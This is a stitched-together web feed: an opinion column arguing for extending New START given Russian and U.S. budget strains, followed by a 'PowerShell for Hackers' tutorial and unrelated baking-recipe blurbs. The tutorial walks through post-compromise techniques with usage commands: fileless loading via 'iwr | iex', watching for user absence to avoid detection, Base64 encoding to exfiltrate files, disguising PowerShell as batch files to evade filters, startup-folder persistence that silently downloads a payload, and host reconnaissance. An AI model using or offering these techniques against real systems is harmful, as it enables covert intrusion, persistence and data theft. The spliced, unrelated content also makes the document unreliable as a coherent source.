That was Russian President Vladimir Putin speaking to members of his Security Council in the Kremlin on September 22, 2025, in the Kremlin.

Later that day, when White House Press Secretary Karoline Leavitt was asked about Putin’s offer, she said, “The President is aware of this offer extended by President Putin, and I'll let him comment on it later. I think it sounds pretty good, but he wants to make some comments on that himself, and I will let him do that.”

One day later, 22 minutes into his long, rambling speech before the U.N. General Assembly, President Trump departed from his prepared remarks and said, “We want to have a cessation of the development of nuclear weapons. We know and I know and I get to view it all the time — Sir, would you like to see — and I look at weapons that are so powerful that we just can’t ever use them. If we ever use them, the world literally might come to an end. There would be no United Nations to be talking about. There would be no nothing.”

I want to believe that was President Trump beginning to respond, extemporaneously, to Putin’s offer, and serious talks will soon begin to extend the New START limits on U.S. and Russian deployed nuclear warheads and delivery systems.

Let me suggest a reason why Putin made the offer and more reasons why Trump should go along.

In calling for the New START extension, Putin made reference to “U.S. plans to expand strategic components of its missile defense system, including preparations for the deployment of interceptors in outer space.” That was a reference to Trump’s so-called Golden Dome, space-based, missile defense plans of which Putin said, “practical implementation of such destabilizing measures could nullify our efforts to maintain the status quo in the field of strategic offensive arms.”

It reminded me of 1984, when then-President Ronald Reagan started his own space-based missile defense program, the Strategic Defense Initiative (SDI), which also drew complaints from Moscow. However, three years later, Reagan and then Soviet Union President Mikhail Gorbachev signed the 1987 Intermediate-Range Nuclear Forces Treaty, which at that time did away with a whole class of nuclear weapons.

Eventually, when SDI proved unworkable, in 1991 then-President George H.W. Bush and Gorbachev agreed to the first Strategic Arms Reduction Treaty (START).

At the time, the was a belief that Gorbachev sought negotiations that led up to START because Russia could not afford to match the costs the U.S. was putting into space-based missile defense.

Back then, I believed that was the case and today I think that Putin, faced with continued fighting in Ukraine, cannot afford a space-based missile defense competition with the U.S. -- and neither can Trump, although the latter does not know it yet.

The Ukraine war costs are dominating Russia’s economy.

After raising personal income taxes sharply at the start of the year, Putin had pledged there would be no more big changes to the tax system until 2030. But the Russian Finance Ministry last week said it intends to raise the country’s value added tax (VAT) by two percent to 22 percent, to help meet the growing deficit. Russia’s VAT applies to the sale of goods and services within Russia, the import of goods, and the provision of electronic services by foreign companies, much like a U.S. excise tax.

The Russian budget deficit increased to 4.9 trillion rubles ($58 billion) in the January-July 2025 period, up from 1.1 trillion rubles ($13 billion) the year before. Russia has already revised its 2025 deficit projection upward from 1.7% to 2.6% of GDP. Russia’s oil and gas revenues fell 19% compared with the year earlier, in part due to lower global oil prices, but also thanks to lower world purchases, such as Moscow’s loss of most of its natural gas sales to Europe.

At home, inflation is around 8 percent as wholesale gasoline prices in Russia have surged in part because of Ukrainian drone attacks that have damaged oil refineries and shut down some major facilities. In August, the government introduced a temporary gasoline export ban and last week Deputy Prime Minister Alexander Novak said the plan is to extend that ban through the end of the year.

The Cipher Brief brings expert-level context to national and global security stories. It’s never been more important to understand what’s happening in the world. Upgrade your access to exclusive content by becoming a subscriber.

On Friday, Kremlin spokesman Dmitry Peskov said that Russia had not yet received signals from the American side via secure channels in response to President Putin’s proposal to extend New START. But, when asked about the timing of a Washington reply, Peskov said, “We’ll wait this week,” noting Trump’s busy schedule during the United Nations meetings. “Understandably, these have been difficult days for him [Trump],” Peskov added.

Trump’s most immediate problem this week is the looming shutdown of the government. But when he gets around to dealing with Putin’s offer to extend New START, he faces some new U.S. nuclear weapons cost problems that he needs to recognize, along with serious technical issues facing his Golden Dome program.

For example, on September 18, the Government Accountability Office (GAO) reported to Congress that the modernized, uranium processing facility in Oak Ridge, Tennessee that was originally to be operational in 2026 to ensure uranium for nuclear weapons and to fuel U.S. Navy ships will not be ready before 2034. Meanwhile, the original cost has ballooned from $6.5 billion in 2018 to $10.35 billion.

More concerning, the GAO said the National Nuclear Security Administration (NNSA), which runs the nuclear complex, said its contractor has said that it will cost about $463 million to safely continue uranium processing operations until 2035 for current needs in the 80-year-old Building 9212 at Oak Ridge.

At the same time, the U.S. is in the midst of modernizing its three major strategic nuclear delivery systems – B-52 long-range heavy bombers with the B-21; Ohio class strategic nuclear submarines with Columbia class submarines; and Minuteman III land-based intercontinental ballistic missiles (ICBMs) with the Sentinel system.

This ambitious program, which the Congressional Budget Office this year said may cost nearly $946 billion to operate and modernize over the next ten years, has shown some troubling problems. While the B-21 bombers seem to be on schedule, the Columbia submarines are running about one year behind schedule. Although the Navy claims the first one will go on patrol in 2030, the Navy is planning to extend the service lives of up to five Ohio-class SSBNs to hedge against potential delays in the deliveries of Columbia-class boats.

Problems with the Sentinel ICBM system are much more serious.

Need a daily dose of reality on national and global security issues? Subscriber to The Cipher Brief’s Nightcap newsletter, delivering expert insights on today’s events – right to your inbox. Sign up for free today.

The Defense Department (DoD) earlier this month estimated the Sentinel program, which involves replacing 450 Minuteman IIIs, currently based in silos in three different states, will cost more than $140 billion and be delayed by years.

Because of the Sentinel delay, the Air Force “must continue to operate and maintain the aging Minuteman III system over the next decade and beyond to meet strategic deterrent requirements until Sentinel is fully fielded,” according to a September 10, GAO report. Air Force Global Strike officials told the GAO that “operating two weapon systems simultaneously while executing a massive military movement to convert the old system to the new system,” would be “a very complex operation.”

Another issue: “As part of Sentinel restructuring, the Air Force is reassessing all aspects of its plan to field Sentinel, including the extent to which Sentinel will use the existing Minuteman III launch facilities. The Air Force has yet to finalize the design for Sentinel launch facilities,” the GAO said.

I have to add to the current strategic nuclear issues facing the Trump administration, serious doubts remain as to whether the President’s space-based Golden Dome missile defense will ever reach fruition.

I have in past columns quoted Todd Harrison, Senior Fellow at the American Enterprise Institute, as explaining the complications with the idea of space-based interceptors killing enemy ICBMs during their boost phase, which is a key element of Golden Dome. As Harrison has explained it, you have only two-to-three minutes to target and shoot during the enemy ICBM’s boost phase, and then because your orbiting interceptors need to be in range, there’s a requirement that at least 500 interceptors would be needed for each target.

During a September 16, interview at the Council on Foreign Relations, Harrison added a Golden Dome price when he said, “If you want to do boost-phase intercept from space, we're talking something if you really want to do the scale of protection they're talking about for a Russian or a Chinese or a Russian Chinese simultaneous launch, Worst case, you are talking something that's going to go into the trillions of dollars over the next twenty years or so.”

I lay out these details to show that Trump, as well as Putin, has a financial incentive to do the right thing and together renew the New START agreement.

The Cipher Brief is committed to publishing a range of perspectives on national security issues submitted by deeply experienced national security professionals.

Opinions expressed are those of the author and do not represent the views or opinions of The Cipher Brief.

Have a perspective to share based on your experience in the national security field? Send it to Editor@thecipherbrief.com for publication consideration.

Read more expert-driven national security insights, perspective and analysis in The Cipher Brief

Welcome back, cyberwarriors!

We are continuing our PowerShell for Hackers module and today we will look at another range of scripts. Some of them will focus on stealth, like checking if the user is still at the keyboard before taking action. Others are about making your presence felt with changing wallpapers or playing sounds. We also have scripts for moving data around by turning files into text, or avoiding restrictions by disguising PowerShell scripts as batch files. We also added a script with detailed system report as a part of privilege escalation. On top of that, we will cover a quick way to establish your persistence and make it run again after a restart.

Studying these is important for both sides. Attackers see how they can keep access without suspicion and get the information they need. Defenders get to see the same tricks from the other side, which helps them know what to look out for in logs and unusual system behavior.

Let’s break them down one by one.

Detecting User Activity

Repo:

https://github.com/soupbone89/Scripts/tree/main/Watchman

The first script is focused on detecting whether the target is actually using the computer. This is more important than it sounds. Especially useful when you are connecting to a compromised machine through VNC or RDP. If the legitimate user is present, your sudden appearance on their screen will immediately raise suspicion. On the other hand, waiting until the workstation is unattended allows you to do things quietly.

The script has two modes:

Target-Comes: Watches the horizontal movement of the mouse cursor. If no movement is detected, it sends a harmless Caps Lock keypress every few seconds to maintain activity. This keeps the session alive and prevents the screen from locking. As soon as the cursor moves, the function stops, letting you know that the user has returned.

Target-Leaves: Observes the cursor position over a set interval. If the cursor does not move during that time, the script assumes the user has left the workstation. You can specify your own time of inactivity.

Usage is straightforward:

PS > . .\watch.ps1

PS > Target-Comes

PS > Target-Leaves -Seconds 10

For stealthier use, the script can also be loaded directly from memory with commands like iwr and iex, avoiding file drops on disk. Keep in mind that these commands may be monitored in well-secured environments.

Playing Sound

Repo:

https://github.com/soupbone89/Scripts/tree/main/Play%20Sound

Playing a sound file on a compromised machine may not have a direct operational benefit, but it can be an effective psychological tool. Some hackers use it at the end of an operation to make their presence obvious, either as a distraction or as a statement.

The script plays any .wav file of your choice. Depending on your objectives, you could trigger a harmless notification sound, play a long audio clip as harassment, or use it in combination with wallpaper changes for maximum effect.

PS > . .\play-sound.ps1

PS > PlaySound "C:\Windows\Temp\sound.wav"

Changing the Wallpaper

Repo:

https://github.com/soupbone89/Scripts/tree/main/Change%20Wallpaper

Changing the target’s wallpaper is a classic move, often performed at the very end of an intrusion. It is symbolic and visible, showing that someone has taken control. Some groups have used it in politically motivated attacks, others as part of ransomware operations to notify or scare victims.

This script supports common formats such as JPG and PNG, though Windows internally converts them to BMP. Usage is simple, and it can be combined with a sound to make an even greater impression.

PS > iwr https://raw.githubusercontent.com/... | iex

PS > Set-WallPaper -Image "C:\Users\Public\hacked.jpg" -Style Fit

Converting Images to Base64

Repo:

https://github.com/soupbone89/Scripts/tree/main/Base642Image

When working with compromised machines, data exfiltration is often constrained. You may have limited connectivity or may be restricted to a simple PowerShell session without file transfer capabilities. In such cases, converting files to Base64 is a good workaround.

This script lets you encode images into Base64 and save the results into text files. Since text can be easily copied and pasted, this gives you a way to move pictures or other binary files without a download. The script can also decode Base64 back into an image once you retrieve the text.

Encode:

PS > img-b64 -img "C:\Users\rs1\Downloads\bytes.jpg" -location temp

PS > img-b64 -img "C:\Users\rs1\Downloads\bytes.jpg" -location desk

Decode:

PS > b64-img -file "$env:\TMP\encImage.txt" -location temp

With this, exfiltrated data can be restored to its original form on your own machine.

Base64 Text Converter

Repo:

https://github.com/soupbone89/Scripts/tree/main/Base64%20Encoder

Base64 encoding is not just for images. It is one of the most reliable methods for handling small file transfers or encoding command strings. Some commands can break when copied directly when special characters are involved. By encoding them, you can make sure it works.

This script can encode and decode both files and strings:

PS > B64 -encFile "C:\Users\User\Desktop\example.txt"

PS > B64 -decFile "C:\Users\User\Desktop\example.txt"

PS > B64 -encString 'start notepad'

PS > B64 -decString 'cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA='

It even supports piping the results directly into the clipboard for quick use:

PS > COMMAND | clip

Converting PowerShell Scripts to Batch Files

Repo:

https://github.com/soupbone89/Scripts/tree/main/Powershell2Bat

Some environments enforce strict monitoring of PowerShell, logging every script execution and sometimes outright blocking .ps1 files. Batch files, however, are still widely accepted in enterprise settings and are often overlooked.

This script converts any .ps into a .bat file while also encoding it in Base64. This combination not only disguises the nature of the script but also reduces the chance of it being flagged by keyword filters. It is not foolproof, but it can buy you time in restrictive environments.

PS > . .\ps2bat.ps1

PS > ".\script.ps1" | P2B

The output will be a new batch file in the same directory, ready to be deployed.

Autostart Installer

Repo:

https://github.com/soupbone89/Scripts/tree/main/Autostart

This is a persistence mechanism that ensures a payload is executed automatically whenever the system or user session starts. It downloads the executable from the provided URL twice, saving it into both startup directories. The use of Invoke-WebRequest makes the download straightforward and silent, without user interaction. Once placed in those startup folders, the binary will be executed automatically the next time Windows starts up or the user logs in.

This is particularly valuable for maintaining access to a system over time, surviving reboots, and ensuring that any malicious activities such as backdoors, keyloggers, or command-and-control agents are reactivated automatically. Although basic, this approach is still effective in environments where startup folders are not tightly monitored or protected.

First edit the script and specify your URL and executable name, then run it as follows:

PS > .\autostart.ps1

All-in-one Enumerator

Repo:

https://github.com/soupbone89/Scripts/tree/main/Enumerator

The script is essentially a reconnaissance and system auditing tool. It gathers a wide range of system information and saves the results to a text file in the Windows temporary directory. Hackers would find such a script useful because it gives them a consolidated report of a compromised system’s state. The process and service listings can help you find security software or monitoring tools running on the host. Hardware usage statistics show whether the system is a good candidate for cryptomining. Open ports show potential communication channels and entry points for lateral movement. Installed software is also reviewed for exploitable versions or valuable enterprise applications. Collecting everything into a single report, you save a lot of time.

To avoid touching the disk after the first compromise, execute the script in memory:

PS > iwr http://github.com/… | iex

All of this data is not only displayed in the console but also written into a report file stored at C:\Windows\Temp\scan_result.txt

Summary

Today we walked through some PowerShell tricks that you can lean on once you have a foothold. The focus is practical. You saw how to stay unnoticed, how to leave a mark when you want to, you also know how to sneak data out when traditional channels are blocked, and how to make sure your access survives a reboot. Alongside that, there is a handy script that pulls tons of intelligence if you know what you’re looking for.

These are small and repeatable pieces hackers can use for bigger moves. A mouse-watch plus an in-memory loader buys you quiet initial access. Add an autostart drop and that quiet access survives reboots and becomes a persistent backdoor. Then run the enumerator to map high value targets for escalation. Encoding files to Base64 and pasting them out in small chunks turns a locked-down host into a steady exfiltration pipeline. Wrapping PowerShell in a .bat disguises intent long enough to run reconnaissance in environments that heavily log PowerShell. Simple visual or audio changes can be used as signals in coordinated campaigns while the real work happens elsewhere.

The post PowerShell for Hackers, Part 5: Detecting Users, Media Control, and File Conversion first appeared on Hackers Arise.

A quick, rustic and delicious eggless strawberry almond tart to celebrate the best strawberries. The pastry is butter, crisp, very forgiving and behaves well, the filling sweet like candy, and the almond meal helps keeps the pastry from getting soggy.

The post Strawberry Galette Recipe: Delicious Treats for Any Occasion appeared first on Passionate About Baking.

Strawberry season always means a burst of colour and these flavours pair beautifully together. This Eggless Strawberry Orange Tart Cake is a great cake for high tea, for birthdays, as a gift or then as a snack. Play around with the flavours, use a chocolate ganache filling, perhaps a layer of bitter orange marmalade ... so many variations for one simple one bowl cake!

The post Eggless Strawberry Orange Tart Cake… fresh and exciting! appeared first on Passionate About Baking.

It’s mango season here and my heart can’t stop dancing! This king of fruits has all our heart and we just can’t get enough of it! Do you love mangoes as much as we do? Then you will love spending your time here as I have curated the best of the best mango recipes from […]

The post 20 Must Try Mango Recipes From Your Favorite Food Blogs for This Summer Season appeared first on Flavor Quotient.

Continue readingThe Binary Exploitation: Stack based Buffer overflow